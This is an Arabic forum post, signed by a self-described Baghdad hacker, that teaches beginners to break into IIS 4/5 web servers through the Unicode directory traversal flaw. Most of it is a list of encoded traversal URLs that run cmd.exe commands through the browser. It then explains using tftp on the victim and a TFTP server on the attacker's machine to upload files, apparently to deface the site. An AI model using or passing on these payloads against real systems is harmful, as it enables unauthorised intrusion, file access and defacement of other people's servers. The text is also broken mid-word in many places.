تعلم اختراق المواقع Iis

السلام عليكم ورحمة الله

شلونكم ياعضاء ماسة الحب اليوم

نتعلم اختراق المواقع Iis

بس رجاءا اي احد ينقل الموضوع يذكر صاحب الكاتب

تحياتي هكر بغداد

IIS بداية نعرف ماهي

هي خدمه متواجدة في ويندوز الفين

بروفشنال وويندوز ان تي IISالـ

IIS5.0...وويندوز الفين يمتلك

الاصدارة الخامسة من ملقم

معلومات الانترنت

بسم الله نبدأ
توجد نقطة ضعف في الاي اي اس

4 او 5 وهذه النقطة تستغل

بطريقة سهلة جداً
وتسمى هذه النقطة باليونيكود
وتنفيذها سهلاً لايحتاج الى خبرة

عميقة في مجال اختراق المواقع
ولكن نقف عند هذه النقطة

للمبتئيدئن
المبتدئين عامةً يفكرون الان في

اختراق عدة مواقع شهيرة بهذه

الطريقة
ولكن لا هذه الطريقة غير مجدية

مع المواقع الشهيرة او غير الشهيرة
لان نقطة الضعف هذه لاتوجد الا

في ويندوز الفين او ان تي
وأغلب المواقع الشهيرة تستخدم

انظمة اليونكس واللنكس
أي ان ويندوز ان تي او الفين نظام

حمايته محدودة وكل يوم تطلع

ثغرات جديدة
لكن بوسع مدراء المواقع ايقاف

نقطة ضعف من نقاط الاضعاف

الموجودة في الان تي
لكن بتلك الطريقة قد يكونون

جعلو حاجزاً لهم من الهكرة
ولكن ليس دائماً
وتنفذ من داخل المتصفح
وطريقة تنفيذ الثغرة كالاتي :
[url=http://www.xxxxxx.com/?

../winnt/system32/cmd.exe?/c

+dir+c:\][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

om/scripts/..?.....exe?/c+dir+c:

\[/url]
ركزو هنا الان بعد دوت كوم

بدأت تنفيذ الثغرة
وبإمكانك أيضا دخول اي ملف

وليس فقط رؤية السي c:هذه الثغرة

تسمح لك بــ عرض جميع ملفات
وتوجد أكثر من ثغرة وهي
/scripts/..%c0%af../winnt/syste

m32/cmd.exe?/c+dir+c:\
/scripts..%c1%

9c../winnt/system32/cmd.exe?

/c+dir+c:\
/scripts/..%c1%pc../winnt/syst

em32/cmd.exe?/c+dir+c:\
/scripts/..%c0%

9v../winnt/system32/cmd.exe?

/c+dir+c:\
/scripts/..%c0%qf../winnt/syste

m32/cmd.exe?/c+dir+c:\
/scripts/..%c1%

8s../winnt/system32/cmd.exe?/

c+dir+c:\
/scripts/..%c1%

1c../winnt/system32/cmd.exe?

/c+dir+c:\
/scripts/..%c1%

9c../winnt/system32/cmd.exe?

/c+dir+c:\
/scripts/..%c1%af../winnt/syste

m32/cmd.exe?/c+dir+c:\
/scripts/..%e0%

80%af../winnt/system32/cmd.e

xe?/c+dir+c:\
/scripts/..%f0%80%

80%af../winnt/system32/cmd.e

xe?/c+dir+c:\
/scripts/..%f8%80%80%

80%af../winnt/system32/cmd.e

xe?/c+dir+c:\
/scripts/..%fc%80%80%80%

80%af../winnt/system32/cmd.e

xe?/c+dir+c:\
/msadc/..\%e0\%

80\%af../..\%e0\%

80\%af../..\%e0\%

80\%af../winnt/system32/cmd.

exe\?/c\+dir+c:\
وطريقة تنفيذها من المتصفح
ومكان تنفيذها بعد اسم الموقع
مثال :
[url=http://www.xxxxx.com/à/

€/à/€/à/€/¯../winnt/system32/c

md.exe/?/c\+][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

x.com/à/€/à/€/à/€/¯...../cmd.ex

e/?/c\+[/url]
أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر

او على اي شكل يظهر
الحل بسيط
Dir هذا الامر لو قمت بكتابته في

نافذة الدوس ستظهر لك الملفات
وطريقة ظهور الملفات في

المتصفح تقريبا
بنفس طريقة الدوس
إذا نجحت في تنفيذ الثغرة

واظهرت الملفات امامك فتبدأ في

تنفيذالخطوة الثانية
الخطوة الثانية عمل ابلود للملف

الذي تريد تحميله
وعمل الأبلود أيضاً لايحتاج الى خبرة
لكن هنالك شروط لكي تعمل

ابلود
يجب التأكد من أن التي إف تي بي

مثبت على الموقع الضحية
وللكي تتأكد إتبع الاتي
يجب الدخول على ملف السستم32

ولكي تدخله يجب أن تضيف بعض

الكلمات على الثغرة التي نجحت في

تنفيذها
مثال:
[url=http://www.xxxxxx.com/?

../winnt/system32/cmd.exe?/c

+dir+c:\][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

om/scripts/..?.....exe?/c+dir+c:

\[/url]
هذه الثغرة عملت في الموقع

المطلوب ورأيت الملفات
لاحظ التغير
[url=http://www.xxxxxx.com/?

../winnt/system32/cmd.exe?/c

+dir+c:\Winnt\Sytem32\]http:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

...Winnt\Sytem32\[/url]
ماوضع على الثغرة هو أسماء

لملفات متواجدة داخل الويندوز

Winnt\Sytem32\
أي يجب عليك الدخول على هذه

الملفات لكي تتأكد
بعض القراء يتسالون ..... الثغرة التي

نستخدمها ليست متطابقة مع

هذه الثغرة ولكن هذا ليس شرط

للتطابقها يجب عليك الدخول باي

كان على مللف السستم
ممكن يكون احد القراء اشتغلت

معاه هذه الثغرة
[url=http://www.xxxxx.com/sc

ripts/..ü€€€€

¯../winnt/system32/cmd.exe?/c

+dir+c:\][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

m/scripts/..ü

€€€€...exe?/c+dir+c:\[/url]
ويقول كيف ادخل على ملف السستم
الحل هو واحد يجب عليك إضافة

اسماء الملفات لكي تدخل على

السستم 32
اي بعد هذا الامتداد
c+dir+c:\هنا تضيف أسماء

الملفات
[url=http://www.xxxxx.com/sc

ripts/..ü€€€€

¯../winnt/system32/cmd.exe?/c

+dir+c:\Winnt\System32\]http

://www.xxxxx.com/scripts/..ü

€€€€...innt\System32\[/url]
كما قلنا سابقاَ لاتحتاج الى خبرة
وبعد دخول ملف السستم ستظهر

لك محتوياته
ويجب على آنذاك البحث عن برنامج

يسمي
tftp.exe يعني دور على هذا

البرنامج الين ماتلقاه وتتأكد من انه

في الجهاز
لان هذا البرنامج يعتبر شرط لكي

تعمل ابلود للصفحة
ولو لقيت البرنامج اتفاءل بالخير يعني

بإذن الله تعبك ماهو رايح على

الفاضي
.................................................

. ...................هكر بغداد....................
والشرط الثاني هو
يجب أن يكون عندك برنامج التي

إف تي بي
وهذا البرنامج تقدر تنزله من هذا

العنوان
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

4/tftpd32.zip
C:\وبعد ماتنزل البرنامج وتفك

الضغط منه من الافضل إنك

تحطه داخل الـ
وتحط أيضا البرامج أو الصفحة

التي تريد أن تعمل لها أبلود في السي
تحطه في السي الى داخل جهازك

مو الى دالخل الموقع
وتشغل البرنامج
tftp32.exe وتتركه يعمل الى أن

تنتهى من مهمتك الأساسية
C:\أسمع كلامي وحط كل شي

في
لأنك لو حطيتها بإذن الله راح

تنجح المهمه

» يلا شباب ادخلو اختراق اى موقع
» يلا شباب ادخلو اختراق اى موقع
» برنامج في الفجول بيسك مال اختراق
» أحد أخطر أوامر الدوس في تدمير المواقع
» نزل كل ما تحتاجه من برامج الاختراق و تدمير المواقع